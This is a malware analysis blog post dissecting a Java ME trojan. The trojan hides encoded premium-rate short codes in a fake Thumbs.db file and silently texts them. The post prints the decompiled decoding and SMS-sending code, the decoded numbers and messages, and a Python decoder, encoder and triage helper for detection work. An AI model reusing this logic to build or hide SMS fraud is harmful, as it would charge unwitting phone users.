Write once, cash everywhere
12 Sep 2011

We happened to bump into a fancy piece of malware which probably targets Russian mobile subscribers.
While malware running on the Android platform has rapidly become the most common mobile malware threat,
Java ME malware is still going strong too. The sample in question has a VirusTotal score of 6/42.
The malware is spread as a JAR package which contains the following files:

mmc.jar is the actual malware package and not part of the directory structure itself. The main business logic of
the malware is in the file M.class. When decompiled, the run() method of the class starts like this:
public void run()
{
try
{
G.setFont(Font.getFont(0, 0, 0));
detect_platform();
decode();
If we then take a look at what method decode() does, we can see something interesting:
public void decode()
{
// Read the first line of the "resource" res/Thumbs.db; that line is the ciphertext.
S.openres("/res/Thumbs.db");
error = S.readln();
S.closeres();
error = upCase(error);
// 41-symbol alphabet; every index computed below is taken modulo its length.
line = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+-/| ";
j = 1;
a = 0;
i = 0;
sog = "";
for(; error.length() >= j; j++)
{
// Smallest value >= a that is congruent to (index of current symbol - 1) modulo 41.
// The ((byte)(cond ? -1 : 0)) != 0 wrappers are decompiler noise for a plain comparison.
for(i = line.indexOf(String.valueOf(error.substring(j - 1, j))) - 1;
(((byte)(a > i ? -1 : 0))) != 0; i += 41);
// Reduce to 0..40 relative to the previous symbol, then keep this symbol's unreduced
// value in a. Net effect: i = (idx(current) - idx(previous)) mod 41.
i -= a;
a = i + a;
// The first symbol gets an extra offset of 4 (i = idx - 1 - 4).
if((((byte)(j == 1 ? -1 : 0))) != 0)
i -= 4;
if((((byte)(i == 41 ? -1 : 0))) != 0)
i = 0;
sog = new String(sog + line.substring(i, i + 1));
}
error = loCase(sog);
sog = null;
// Count the '|' field terminators: one per destination/message pair.
count_query = 0;
for(i = 0; error.indexOf(String.valueOf('|'), i + 1) != -1;
i = error.indexOf(String.valueOf('|'), i + 1))
count_query++;
ms = new String[3][count_query + 1];
j = 1;
// Split each "number/message|" field: ms[1][j] = number, ms[2][j] = message.
for(i = -1; error.indexOf(String.valueOf('|'), i + 1) != -1;
i = error.indexOf(String.valueOf('|'), i + 1))
{
ms[1][j] = error.substring(i + 1, error.indexOf(String.valueOf('/'), i + 1));
ms[2][j] = error.substring(error.indexOf(String.valueOf('/'), i + 1) + 1,
error.indexOf(String.valueOf('|'), i + 1));
j++;
}
}
So decode() opens the file Thumbs.db in the directory res, a file name borrowed from the thumbnail cache
Windows Explorer creates. Instead of thumbnails, this Thumbs.db contains the string:
“/0SIF|6XI8ULE|YNLD5QDA6WM|YJ90RL/+WPJDAFY2 DC3QJ/+3RKA/5YPA0MD-5QFD”
What decode() really does is "decode" that string with a simple keyless substitution: each output symbol is the
entry of the 41-character alphabet at index (current input symbol index - previous input symbol index) mod 41,
and the result is lowercased. It then splits the plaintext on '|' and '/' into destination numbers in ms[1][1..4]
and message bodies in ms[2][1..4]; count_query receives the number of '|'-terminated fields, 4 (int). And where is
the ms array then used? Later in the code, within the run() method of M.class:
if(f < count_query)
{
game = SM.send("sms://" + ms[1][b], ms[2][b]);
if(b == count_query)
b = 1;
else
b++;
}
And the contents of ms[1] (destination number) and ms[2] (message body) for b = 1..4 will be:
7375, 88600168904
7202, 65510006691
1899, fteme 1283
8385, 88600168904
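As an added example (not code from the original post), here is the decoder re-implemented in Python, together with the '|' / '/' splitting that fills ms[1] and ms[2], an inverse encode() that shows the transform is keyless, and a small triage helper that pulls res/Thumbs.db out of a JAR and lists the short codes and message bodies it hides. The JAR it inspects is constructed in memory for the demo (it is not mmc.jar); only the Thumbs.db string comes from the post, and the function and constant names are the example's own.

```python
# Added example, not code from the original post: Python mirror of M.class decode()
# plus a JAR triage helper. build_demo_jar() constructs a stand-in JAR in memory;
# only the THUMBS_DB string below is taken from the analysed sample.
import io
import zipfile

# Same 41-symbol alphabet as the `line` string in decode()
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+-/| "
MOD = len(ALPHABET)  # 41

# The string the post reports inside res/Thumbs.db
THUMBS_DB = "/0SIF|6XI8ULE|YNLD5QDA6WM|YJ90RL/+WPJDAFY2 DC3QJ/+3RKA/5YPA0MD-5QFD"


def decode(cipher: str) -> str:
    """Mirror of decode(): output symbol j is ALPHABET[(idx_j - idx_(j-1)) mod 41].

    The Java inner loop (`i += 41` until i >= a) followed by `i -= a; a = i + a`
    is exactly this modular difference; `a` always holds the previous symbol's
    alphabet index minus one. The first symbol additionally gets `i -= 4` after
    the reduction, so a ciphertext starting with B..E makes the original throw
    StringIndexOutOfBoundsException; here we raise instead of silently wrapping.
    """
    cipher = cipher.upper()          # upCase(error)
    out = []
    shift = 0                        # Java's `a`, reduced mod 41
    for pos, ch in enumerate(cipher):
        idx = ALPHABET.index(ch)     # ValueError for symbols outside the alphabet
        i = (idx - 1 - shift) % MOD
        if pos == 0:
            i -= 4
            if i < 0:
                raise ValueError("first symbol %r crashes the original decoder" % ch)
        out.append(ALPHABET[i])
        shift = idx - 1
    return "".join(out).lower()      # loCase(sog)


def encode(plain: str) -> str:
    """Inverse of decode(): c_0 = (p_0 + 5) mod 41, c_j = (p_j + c_(j-1)) mod 41.

    There is no key, so anyone with the alphabet can regenerate or forge the resource.
    """
    plain = plain.upper()
    out = []
    prev = 0
    for pos, ch in enumerate(plain):
        idx = ALPHABET.index(ch)
        c = (idx + 5) % MOD if pos == 0 else (idx + prev) % MOD
        out.append(ALPHABET[c])
        prev = c
    return "".join(out)


def parse_targets(plain: str) -> list:
    """Replicates the split into ms[1][j] (number) and ms[2][j] (message body).

    As in the Java loop, only fields terminated by '|' count (that is what
    count_query measures); anything after the last '|' is ignored.
    """
    targets = []
    for field in plain.split("|")[:-1]:
        number, _, body = field.partition("/")
        targets.append((number, body))
    return targets


def build_demo_jar() -> bytes:
    """Constructed stand-in for the malicious JAR: only res/Thumbs.db matters here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n")
        jar.writestr("res/Thumbs.db", THUMBS_DB + "\n")
    return buf.getvalue()


def triage_jar(jar_bytes: bytes) -> list:
    """Extract res/Thumbs.db from a JAR and return its (short code, message) pairs.

    S.readln() only consumes the first line of the resource, so we do the same.
    """
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        if "res/Thumbs.db" not in jar.namelist():
            return []
        lines = jar.read("res/Thumbs.db").decode("latin-1").splitlines()
    first_line = lines[0] if lines else ""
    return parse_targets(decode(first_line))


if __name__ == "__main__":
    for number, body in triage_jar(build_demo_jar()):
        print(f"sms://{number}  {body!r}")
```

Run against the real sample you would replace build_demo_jar() with the bytes of the JAR under analysis; because the transform is a fixed modular difference with no key, the same decoder works for any resource the author encoded the same way, and encode() lets you produce test vectors for detection rules without handling the original file.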
The relevant parts of the class SM are as follows:
public class SM
implements Runnable
{
public static int send(String s, String s1)
{
if(isSending)
{
return 0;
} else
{
new SM(s, s1);
return -1;
}
}
public SM(String s, String s1)
{
success = false;
isSending = true;
destination = s;
message = s1;
try
{
Thread thread = new Thread(this);
thread.start();
}
catch(Exception exception)
{
isSending = false;
}
}
public void run()
{
try
{
MessageConnection messageconnection =
(MessageConnection)Connector.open(destination);
TextMessage textmessage =
(TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText(message);
textmessage.setAddress(destination);
messageconnection.send(textmessage);
messageconnection.close();
isSending = false;
success = true;
return;
}
SM.class sends an SMS message to the Common Short Code (premium-rate number) passed as ms[1][b], with the body
passed as ms[2][b], using the JSR 120 MessageConnection API. Note that send() returns 0 without sending while a
previous message is still in transit (isSending), which is why the caller in M.run() wraps b around to 1 after the
last entry instead of assuming that one pass delivers all four. So what happens when the JAR is installed and run?
It sends SMS messages to the numbers below, with the bodies shown, and exits.
Number Content
7375 88600168904
7202 65510006691
1899 fteme 1283
8385 88600168904
A quick web search suggests that at least 7375 is a premium-rate short code in Russia.

The .jar package has the following hash results:
MD5 : b5a56e8a442ac8c81bee612c1fcbcf41
SHA1 : da13a4b16d00c30b153012c39772633d7948982e
SHA256: 8eb735db14e83ceeff9fa15965d40b27822ab513e5f5053b517aaf3c7afbbbb3
- Posted by admin in General Information Security